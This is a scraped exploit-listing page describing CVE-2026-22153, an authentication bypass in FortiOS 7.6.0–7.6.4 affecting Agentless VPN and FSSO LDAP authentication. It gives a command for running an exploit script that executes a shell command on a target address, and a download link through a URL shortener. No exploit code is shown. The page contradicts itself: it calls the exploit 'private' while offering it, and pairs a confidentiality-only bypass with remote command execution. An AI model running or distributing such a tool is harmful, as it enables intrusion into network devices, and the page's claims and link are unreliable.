## https://sploitus.com/exploit?id=5C46E143-D7D4-5BF1-A4E0-66E987352866
# Authentication Bypass Vulnerability in Fortinet FortiOS(CVE-2026-22153)
## Overview
CVE-2026-22153 is an authentication bypass vulnerability identified in Fortinet's FortiOS, specifically affecting versions 7.6.0 through 7.6.4. FortiOS is a critical operating system that underpins Fortinet's security products, providing essential functions such as VPN services and firewall policies.
## Details
- **CVE ID**: [CVE-2026-22153](https://nvd.nist.gov/vuln/detail/CVE-2026-22153)
- **Discovered**: 2026-02-10
- **Published**: 2026-02-10
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
The vulnerability stems from a flaw related to LDAP authentication, whereby an unauthenticated attacker can bypass the authentication mechanisms of Agentless VPN or FSSO policies, contingent on specific configurations of the remote LDAP server. This type of authentication bypass could allow malicious actors to gain unauthorized access to sensitive resources and systems, significantly heightening the risk of data breaches and compromising the integrity of network security.
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Exploit:
### Download [here](https://tinyurl.com/55edautk)